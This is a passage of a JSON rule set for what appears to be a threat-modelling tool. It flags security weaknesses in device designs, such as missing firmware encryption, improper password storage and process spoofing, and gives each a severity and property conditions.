entry","Description":"Missing security-relevant information for audits: login attempts, changes in user session, firmware updates, etc.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"afd4bceb-31b0-41cd-9eae-02d2eba6b41c","ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c7d5fd7a-4007-480c-a34b-cb32fab17472","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a154298a-d410-4da4-921d-906165cd5329","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"91abf825-cfca-4386-b5d5-8262423b090d","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1a582358-45c2-42e2-a21e-61206a4eda7e","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c86b6500-99cb-46e3-948f-b67b69c9768d","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0bd863c2-5505-4226-9b28-bab9715c99d1","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"cf4a11cf-4dee-46ef-8c68-48b5dced2de0","Name":"Missing reporting system","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"23943ca9-3df9-4d69-a414-6d8fef99d30c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c46dc641-6f0f-4e80-9b80-3833f6c4f2c0","Name":"Non-disclosure","Description":"There are mainly coordinated vulnerability disclosure and non-disclosure. Coordinated vulnerability is important for independent security researchers to get reputation. Non-disclosure could possible lead to public reports without fixed vulnerabilities.","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"dd2c4c41-45f0-4105-aea4-317943e2f435","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"19f1cf08-5ab0-419c-9d56-b5d4d1fc6e24","Name":"Missing bug bounty program","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b4c47f35-bcd3-4b18-9b35-8a7f213dcca4","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"370351b8-cef2-43bf-89f2-324a814e00a3","Name":"Missing /security page","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"36e1de4b-5129-470f-b06d-208ef7610da8","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"df78de64-d35e-474f-be3b-260f60a13fc6","Name":"Missing security.txt","Description":"https://securitytxt.org/\\nhttps://en.wikipedia.org/wiki/Security.txt","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"3affc4da-9a78-43ec-990b-75d20edbc410","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"ebf9833c-733d-4356-b390-e754096d0da8","Name":"Missing contact email address","Description":"E.g. security-alert, security, psirt, csirt@companydomain.com","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d94f2535-73f9-4c2d-aef1-57b1c9daaa5c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"543e017c-8bc2-444e-a3fb-d1dbd52ae21b","Name":"Missing public policy","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0c7bdef9-6b56-42db-a22b-a460b08bb27d","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"a68571c4-61b7-4a33-b5d9-104ef2c06ed0","Name":"Missing PGP key","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"61d4b9c9-19a9-431e-b114-f2c04b48846b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"4f2b98fa-8173-411d-a9b9-2cb0fb31fbde","Name":"Missing timeline info","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e7d90cc4-822e-4aab-a161-c766cf13df22","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"96661040-05b5-436b-887a-f7864419d691","Name":"Missing Firmware Encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5605adab-044a-4b1f-9344-90a602d8d448","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","70d07015-4eda-4d1a-8d07-1791f881f8f0"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"434d79b2-574c-4575-813b-19ec7854a139","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"96208355-0119-41f4-9b93-b0a5781e9ae1","Name":"Unnecessary components","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a7e3fa91-ce20-42b3-8e35-e0188ca1ac50","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"dfc187d5-8287-4c8e-99bc-09cc3e26e201","Name":"Outdated OS version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4ba05121-485a-40eb-832a-f4095c7b88df","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"49344c1a-2368-4a01-a366-023707d0b354","Name":"Secure configuration not default","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"41b3d476-6ff9-40d7-ad5b-c5d5fad4cda1","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b640f7fb-fb76-4de9-bcf2-0883807f58da","Name":"Missing component update process","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"36ed4680-0b94-42a9-9863-08eb976c9ebc","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"efd73610-90fd-406a-9139-82ff0552bc43","Name":"Activated services and ports","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"fb3b36de-11b3-4e5d-9c9c-4dcfab666da6","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"8886f368-618b-4520-a7f5-1db3141da66b","Name":"Improper permission configuration","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c8a14b27-b13f-4358-9f3f-691d01c97c77"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c93fbf95-01d7-45fb-a786-0eb926e6dc2c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"16f2c70d-1752-4e7a-b1ac-5f95710c2778","Name":"Least privilege violation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec"],"AttackVectorID":"66c5f951-6286-4b22-a71a-ee4d6232f689"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"7378780b-e280-4494-84f2-0beb4e7257ec","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"019f2476-ceca-47ab-b19e-9c2077cc35fe","Name":"Missing file system encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"85e19877-51a0-4904-8e98-b2fb14be3922","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"5d407978-73dc-45c9-8402-db692b42dae4","Name":"Improper boot order","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"eb678bc0-3ece-4937-bba3-03981c5759a4","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"10a258f6-49c0-435e-9a66-630039de0dc8","Name":"TOCTOU attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"cf63f187-4353-4bf8-bc37-a7392c6d91bf","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f3697413-e4de-4572-90b1-8041e8ff9b67","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"61e37274-9751-4250-8a4d-6476edc8f732","Name":"Boot Code Protection in RAM","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"f0a8edb7-d65f-423f-a391-120d1eb04e02","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"885834f4-b8b6-485b-8690-6ac525dbb59d","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"568a6a24-9109-4f93-b3b3-d3754260387e","Name":"Least privilege violation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"66c5f951-6286-4b22-a71a-ee4d6232f689","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"03d7ff9f-bbdc-4938-974d-cd9766bdb8e0","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"5d59dab8-ca08-4359-8e7d-284dcde6d4b7","Name":"Missing application isolation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"532fc4c6-b14f-4b9a-b033-f4aaf0d63e25","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"de96008b-1c59-4319-9b5c-4f5a7e97a122","Name":"Improper input validation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1c1a93cf-acce-4f57-a210-e0b5058f57b8","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"337c4826-08ed-4c40-9542-54f08317ddb0","Name":"Keys not stored in security module","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"64bb2754-a187-47c8-aa93-e599f0a97a57","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"eac955da-c90f-4ca8-a1c1-bc186f7f0ad2","Name":"Key usage in untrusted environment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b43ada71-51c6-4f5e-b310-a1735a41e602","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"1267c02f-4adf-4086-9a9b-c5cc0f81c709","Name":"Missing key encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b6c0efb3-7db3-4dd8-8c60-620027eefa3e","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a529a0c3-a98e-41be-80f5-84b876ddddc6","Name":"Missing tamper resistant unique ID","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"08ee42e8-3525-4767-98e3-f7492f356d2f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b41315d4-f62d-4133-9a38-be8097a66ebb","Name":"Missing unique user identification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6391f8f2-eb04-4caf-b490-49c920315867","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"50864039-1856-432a-9ff2-0acf3cccd644","Name":"Missing privilege differentiation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackVectorID":"3162421f-ca5b-400d-bbe8-58a510be9abf"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cdb65d33-946e-412e-838b-3075e928c4f0","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d17d5929-ebcd-4c2c-95b6-f7c8ab4c5538","Name":"Improper password storage","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"eab94c5b-f7e8-4b2a-9ffb-658aefc8f0d0","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"984400a6-7bd6-4031-a40c-06f0499e0d86","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"cffa8a3a-ec5b-4e2c-b118-80741e1c8e2a","Name":"Missing certificate chain verification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b26fc3e4-7a38-4f00-acdb-ec78246d0b25","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"20b12b0e-4031-4eb3-ad39-f91489884490","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"8bab4292-bca9-4701-8141-a62fc2b2cded","Name":"Certificate expiration","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6509fe5f-7e27-40ec-bd08-97e29c67f8c1","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e09bd987-fbf4-4f3d-afeb-033e5bdcb7f8","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ab8ff926-1147-4597-bded-42fbfb71edb2","Name":"Revoked certificate","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ed84da5f-3181-4be1-bef4-d911077b1910","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c9d634b6-7eb8-4210-9e97-58e93a5c09a0","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"135275c4-5523-4a95-a466-47947930377a","Name":"Uncleared user data","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"327a2f35-8cf5-46d5-a973-a174f6f7be23","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e6ee6f25-6e52-4f43-93c4-7ef35eb97024","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"dbf5eca4-f98b-443d-b9a1-8113fafc962e","Name":"Password sharing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ffd6083b-7183-472c-b250-15b0de223735","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6391f8f2-eb04-4caf-b490-49c920315867","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"85519ed2-313e-4c85-85fd-f89109f845d4","Name":"Unhandled exceptions","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e36eff83-1863-4026-bffe-966a9a104331","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"897ef1fd-f1e7-4527-89e3-2cdaf2c8644a","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"871318c9-4e0c-4ff4-a475-06195ea4e3bb","Name":"Sensitive (error) information exposed ","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f7733c50-2529-459f-9397-8d06f231121c","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"bf9e6225-fb28-429a-84f1-fe3be63c3d95","Name":"Sensitive (authentication) information exposed","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"157fd588-2ea2-4260-9a25-86bf8241b31c","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"e2529607-c1fd-472d-ad14-c7f2cc719282","Name":"Booting manipulated firmware","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c31746fb-c296-4eda-b7a5-8227640e9c80","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"43deca38-18ab-4c2b-98f0-52f0b1bfefac","ComparisonType":"==","Value":true}}]},"Severity":4},{"ID":"a3c2f053-c8d6-4626-ae54-79f87ae171c3","Name":"Hardware manipulation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b8b580e-f99a-4e0c-850d-241fccfd0079","DetailRestrictions":[]},"Severity":1},{"ID":"221071ed-1d87-43cc-8052-b615e6ebef04","Name":"Key disclosure","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2d7223ec-7361-4f2a-bfea-d6c437e9a4f4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"5fccd43c-b3f0-405a-bfcc-8d2bb73bdd9e","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"6b4eb6d6-a03f-4678-a033-924bd5526f13","Name":"Spoofing the sender process","Description":"The sender process may be spoofed by an attacker and this may lead to unauthorized access to the receiver process. Consider using a standard authentication mechanism to identify the source process.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c6bc382b-d155-41c4-a41b-959d8a223e54","Name":"Spoofing the receiver process","Description":"The receiver may be spoofed by an attacker and this may lead to information disclosure by the sender. Consider using a standard authentication mechanism to identify the destination 